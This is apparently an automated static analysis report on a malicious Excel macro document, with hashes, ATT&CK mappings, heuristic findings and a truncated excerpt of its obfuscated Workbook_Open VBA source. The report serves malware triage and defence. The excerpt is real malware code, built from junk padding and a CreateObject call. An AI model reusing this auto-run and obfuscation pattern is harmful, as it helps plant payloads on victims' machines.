Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6aeaf8de926d21b4…

MALICIOUS

Office (OLE)

60.0 KB Created: 2018-10-15 23:09:32 Authoring application: Microsoft Excel First seen: 2019-04-17
MD5: 86d5c99b3ec5d576fa9ab34f14af66f1 SHA-1: 50fa8c866071da9a76115912095bf34b776f5d5f SHA-256: 6aeaf8de926d21b40fdc254d48aca446058b87fb5abe036b71fb6e436e16a1a0
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell() call and CreateObject, indicating it's designed to execute arbitrary code, likely to download and run a secondary payload. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the 'unknown family' classification.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15799 bytes
SHA-256: dccf55e3a98374352a3c1e7c4c454a4ea4dcf21099fb2820d2ccf8cf77b358f8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
Xb5IWYK.Kn1Qj1GkRHt8Ek_pgCaa
While 9 = 4371
Dim VWrY_NOx_ESiuLftgJSRNw24B2K85OI3httw5ZQTjSkKxIK3DTHVrGKhdxW As Variant
Wend
Dim FCQ2s6YA_b As Integer
While 10 = 2477
Dim sxE29r5Kp_1oR3jEvIYhJQFCIQQZ1NWGJYSeCdsYPUwreatW As Variant
Wend
Dim PlIOkaPZpB As Integer

While 23 = 7052
Dim rpYcSaprc2hDCQZ9PxcXgrf4HN_GfsG3y_uB_vBUAv71xLi1xkIa6Qd9HeS As Variant
Wend
Dim UgJtsoNBeX9dvGV As Integer
While 28 = 7895
Dim tto_6oLR5ho7fev2db7_cjKFH7fUYloox5sMcYVYHMOKD As Variant
Wend
Dim rqfsecAyF3Hh As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Xb5IWYK"
Dim PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1 As String
 Function g59G13Q2_HkugWD_g1NT9CZN9l3GmzpBjo5dWPQT8SCiEtKFY(I8KiXLeX4A_5NhVxeIUYPRq_Jea1bV5kkWBIL8qYJ2_KsRExwcxgGcMzOJX3tn6g_bR1eLkgb6MXMdP2YmC8gVbFHK4Bixof5gEO9NQj2P_KNylt3ebEj79r9KqSQi7mOqbpX_2JTbEO)
While 4 = 2838
Dim pjS_ZZMLHdFRtPu4xgEhVG73UIIVTJj8LqmafynxWmnxGTAVSk9KwI As Variant
Wend
Dim dglYnOPz174GEC As Integer
While 24 = 5396
Dim mSV82QIrcHt_HvCrJWJCK_xEJWffup39N7s9NAR As Variant
Wend
Dim e9uDcnmFcwGue7C As Integer
While 28 = 7492
Dim geOwctm7vNuuJBDcIDnCY_SZgPCsl4WAJEKb8LxtTxQN315ar As Variant
Wend
Dim mkZR9ZfJxOLq3S1 As Integer

 Dim Eup2j5eKVw3CEvUm8rc9WO2kgkMKDqJVEYt5_jBNeuUy7_agnmooUB6z3DS9qSGolf7pBZhWoMcl3BnbHofYAdADc4B_OBgKloLYGudM_Q9FhR6zYzyAvrnFd3LGXhFlpQ9MyMTVIRTrd3d
While 11 = 1428
Dim siDzje6N3qkr_foUj_9R6rKonQH7kCacYWIPzjG As Variant
Wend
Dim GnJXPxwEPizE2T As Integer
While 10 = 6925
Dim g4_WXJRU9lzOFRqVWd92zntS4zzJ2Vu7hH1bI As Variant
Wend
Dim aXyvoghApdX4KUE As Integer
While 14 = 8626
Dim c3IpbgTFcl12q8ZNKdCiBD9Kt3HTv7JXz As Variant
Wend
Dim gn8QbY3DqQCoo As Integer


   Dim QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS
While 12 = 3467
Dim SrDHqpQe8X475hW9TeZbBHRb6rDIeTu5e_iZPlN As Variant
Wend
Dim cESiNCSgzdDVvk As Integer
While 23 = 4821
Dim LmIXjL8lG_mm8az97qqO7UqhCYkJMnZ79SQaYApXP18S6kD2q1f As Variant
Wend
Dim Unem15jUJkwXbho As Integer
While 24 = 2839
Dim mmHXi5AQ9EWWlZTrcUFDQcoZexodwbbdtP8YsRQkS As Variant
Wend
Dim Vegcg84z2S As Integer
   
While 25 = 419
Dim BUdVI7r2tNfcem3mUb49JDes57G78zun5HYHN3xb_YfUw2 As Variant
Wend
Dim j4ka62G8ytaK As Integer
While 27 = 8663
Dim yu44c2hULtWama8tfH5C7MUDMSrB_aRdaklNek25SmpzfHw As Variant
Wend
Dim c3WZpxXNkX As Integer
While 24 = 9529
Dim ypHIeTuZ2_AxsN5O_sRfegDfMHl_loCVAzo5suwQ5XmHu As Variant
Wend
Dim oIHeYxo5_2Q As Integer
 Set QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS = CreateObject(PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1)
While 27 = 2701
Dim kl5VrtxL7nw2h9fM5AjF45th8cdK1WZ57VREyYiJiYJE1Pie2is4cuWp As Variant
Wend
Dim VXNNkUiM15JoY As Integer
While 22 = 2836
Dim XdZXfcsmpp38SPmeZK9kNbAT58
... (truncated)